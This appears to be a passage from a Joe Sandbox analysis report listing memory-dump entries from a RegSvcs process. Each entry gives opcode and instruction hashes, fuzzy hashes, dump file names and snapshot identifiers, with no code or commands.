                                  • Opcode ID: 3f665a6e87f5dd101fb751aa2e32f1de3266a271de5a6a114dd0ced03b539fb5
                                  • Instruction ID: 2030fb4d78156a4f905723d33d59bd73e8fffbc91ee488abf26f49cc751af586
                                  • Opcode Fuzzy Hash: 3f665a6e87f5dd101fb751aa2e32f1de3266a271de5a6a114dd0ced03b539fb5
                                  • Instruction Fuzzy Hash: D9A16E34B01215CBEBACEB64D864BAAB777BB88301F1080E9D50AAB785DF319D41CF51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $>f
                                  • API String ID: 0-2253003967
                                  • Opcode ID: daba982f359bfdbb9b687ad9438c9e2cebabd8578fdb05e0b018c0cee1766573
                                  • Instruction ID: fe60154bcbc04fe4cc7fb012c1ace27f714466f8dffae5ab36f4ed8a836da282
                                  • Opcode Fuzzy Hash: daba982f359bfdbb9b687ad9438c9e2cebabd8578fdb05e0b018c0cee1766573
                                  • Instruction Fuzzy Hash: E3A14E34A10215CFDB58DF64C994A9AB7B2FF89300F1081E9E50AAB3A1DF719E85CF41
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: P/q1
                                  • API String ID: 0-3198327278
                                  • Opcode ID: 0f8e9189f7a4ad189061436f1d6c2a2b0750f9602913a4ffcc053a32da626696
                                  • Instruction ID: 4a21f7b05f43f321cfbd445ef5a4fa411146b9cfc15f083ceaa4595f2538400c
                                  • Opcode Fuzzy Hash: 0f8e9189f7a4ad189061436f1d6c2a2b0750f9602913a4ffcc053a32da626696
                                  • Instruction Fuzzy Hash: 5C41B031A00205CFC7A4CF79C985A6BBBF2FF84350F1588AAE95ADB655D230E949CF01
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e92854dcef36cbe5ea8b62221edb5339d1c1cbc993b50cf767e77d23787b1275
                                  • Instruction ID: fcfa0d371e9405b67f737c3a9bf0c70637bcdfbc41b584cf519424eab1f947fd
                                  • Opcode Fuzzy Hash: e92854dcef36cbe5ea8b62221edb5339d1c1cbc993b50cf767e77d23787b1275
                                  • Instruction Fuzzy Hash: 40225F30B002059FCB28DF69C584AAEBBF2BF88315F149959E906DB7A1DB31ED41CB50
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: adb204aee1810ffb2fea723be90158bd6a6eef92dcf7846a3b350c52e2ad7faf
                                  • Instruction ID: 39d7a0efc9f6df28a05cb1cd4752757d2caabb3d155b5382eadf129d3586390a
                                  • Opcode Fuzzy Hash: adb204aee1810ffb2fea723be90158bd6a6eef92dcf7846a3b350c52e2ad7faf
                                  • Instruction Fuzzy Hash: 97B11470E082148FC765CB68C49176EFBF6AFC9300B98C5AAE556DB266C770EC45CB90
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2fc338ed34fe0f48f146c89f3f5087d5562f0cebdbfcc7562333a634d90ea5d9
                                  • Instruction ID: d2ba2c509db38079e3ee9193d7e61c711fbfc05b8227974ff2a6af114dcc8a22
                                  • Opcode Fuzzy Hash: 2fc338ed34fe0f48f146c89f3f5087d5562f0cebdbfcc7562333a634d90ea5d9
                                  • Instruction Fuzzy Hash: 35B1E430A042108FCBA9CB69C5A466EFBF6EFC5300B58C5AAD556DB269C730ED85CB50
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9ec1a5301f68f3ff620b664beb438af70987d93c14fb915906f14b830d201b27
                                  • Instruction ID: bb209af02cd2be04c6316d21eb9faf0ece05e6a723d584e6b97a14e6619a7e3b
                                  • Opcode Fuzzy Hash: 9ec1a5301f68f3ff620b664beb438af70987d93c14fb915906f14b830d201b27
                                  • Instruction Fuzzy Hash: B1A1E430B042108BDB69CB6DC59466EFBF6EFC5300B98C5AAD156DB268C770ED85CB50
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9753b8aca22fa128d92b10beff7d8ecb2a19f9e53858380649f83e3ea3d40c7
                                  • Instruction ID: 38a794e20481370d233eec4e5a1282c2b5480dcb27c37adcb8e5c9c2a4717d6a
                                  • Opcode Fuzzy Hash: d9753b8aca22fa128d92b10beff7d8ecb2a19f9e53858380649f83e3ea3d40c7
                                  • Instruction Fuzzy Hash: B7A1C170E042148FCB65CB68C49076EFBF6AFC9300B54C9AAE156DB265C770EC45CB90
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 381da3754f4f772be5ad8e151e93591c1d14d72dda515eba79f4a67f4ec7f65d
                                  • Instruction ID: b0b0604dd37689655947279ed33676d5c68fc6b5a93e66f1e762f2cdfc5c79b1
                                  • Opcode Fuzzy Hash: 381da3754f4f772be5ad8e151e93591c1d14d72dda515eba79f4a67f4ec7f65d
                                  • Instruction Fuzzy Hash: 7E818034B002189BDB5CAF75885467E77BBBFCC750B05C56DE966EB288CE34880AC791
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 875b9ac8297bd691bd7d1f79e4492c2531e068ff11fd9ece7e9b056d569f37e0
                                  • Instruction ID: 1e8fc91a06f45c6d15dbe065e9ae7e6d98bcc2c4c732be5aa62a70888d25aa7d
                                  • Opcode Fuzzy Hash: 875b9ac8297bd691bd7d1f79e4492c2531e068ff11fd9ece7e9b056d569f37e0
                                  • Instruction Fuzzy Hash: 04A1A230A042148FCB95CB69D58067FFBF2AFC6300B15D9AAD666E7655C730EC48CB54
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c61713748b4bcdd681ca169c83560bb8f0e2c9bd91c2c46053b684727d217f70
                                  • Instruction ID: 279efff0f0ddcebb02b3a45d5c33933a5e416b2ebb912fef0fc74a1bdad30cbc
                                  • Opcode Fuzzy Hash: c61713748b4bcdd681ca169c83560bb8f0e2c9bd91c2c46053b684727d217f70
                                  • Instruction Fuzzy Hash: 3E71F9B6F182958FCB84CF6CC9819AEFFF5AB85210F1180E6D605EB351C634DA49CB91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cabc9e58e369ef88b51731538094c585451b3508e72833baad127f19cd534e50
                                  • Instruction ID: 28437e473e6893a96b064c6fa3d9431379d2a0988175e2ccd1f16ce5cc4cc836
                                  • Opcode Fuzzy Hash: cabc9e58e369ef88b51731538094c585451b3508e72833baad127f19cd534e50
                                  • Instruction Fuzzy Hash: 8041A3B5E1429A8FCB84CF5CC9859AEBBF5EB88204F0181E6D506EB650C334DA44CB91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6ffcc3a90660531eacc5d24ab41ee5ef317652f12fe0543dd4c1731c9e12f8c
                                  • Instruction ID: 8d4f35a4343306e57c4d078086744be589640bf56de7eaa8833527b6b9b05d93
                                  • Opcode Fuzzy Hash: c6ffcc3a90660531eacc5d24ab41ee5ef317652f12fe0543dd4c1731c9e12f8c
                                  • Instruction Fuzzy Hash: B841F431A04205CFC7A4CF79C981A6ABBF1FF84310F1588AAD95ADB661D234E948CF01
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 22c81e77c006f428ae4276e52d64b9ad8f020c1737b5aa83f90e8470ba101530
                                  • Instruction ID: 1787d67c5b0efc221530e7760279e2567ae73a84c0b6e51b9541ded95ead784b
                                  • Opcode Fuzzy Hash: 22c81e77c006f428ae4276e52d64b9ad8f020c1737b5aa83f90e8470ba101530
                                  • Instruction Fuzzy Hash: D641C370614209CFDB18EF38D8957AEB677ABC9340F1094BA850AEB391CB348E41CF51
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a654375a9f482cad9f217d325fb08ba5e016b49211c45575780b446ea688475
                                  • Instruction ID: b87e28f8879280663c41164bc8b85321170c0ae35bfb4c803f0697844f93db8b
                                  • Opcode Fuzzy Hash: 1a654375a9f482cad9f217d325fb08ba5e016b49211c45575780b446ea688475
                                  • Instruction Fuzzy Hash: 77419470A04219CFDB68DF24D8917AFB776AB89340F1094AAC50AAB791CB35CE42DF51
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 39539442b137b4bfd74fafd9fba817a3c7d398aff87ddce84451642b18b6fd50
                                  • Instruction ID: 9110660d9b5f697bcff882dc1af987bee8a8c4dd40798821a871cfd7597b1f71
                                  • Opcode Fuzzy Hash: 39539442b137b4bfd74fafd9fba817a3c7d398aff87ddce84451642b18b6fd50
                                  • Instruction Fuzzy Hash: 9C41B47070421ACFDB68DF24D8917AEB776AB85340F1094BAC50AAB391CB35CE41DF51
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f188e075f3a3871f666bf8187ad2d179b5dc4e31823f9c1fc987e5db0a151d38
                                  • Instruction ID: 08ab1c9c3b2f6e70dbbb4e58a29fd7b43e89a1e279bfc39943ca5f77e16ce505
                                  • Opcode Fuzzy Hash: f188e075f3a3871f666bf8187ad2d179b5dc4e31823f9c1fc987e5db0a151d38
                                  • Instruction Fuzzy Hash: 0E21D672F192469BCB84CF59C5855AEFBB5BBC5310F1084E7C615EB252DA30DA09CB82